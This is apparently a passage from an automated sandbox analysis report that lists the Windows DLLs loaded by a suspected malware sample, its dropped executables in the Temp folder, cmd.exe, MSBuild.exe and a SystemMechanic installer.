Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: security.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: olepro32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: schedcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: idndl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ntmarta.dll
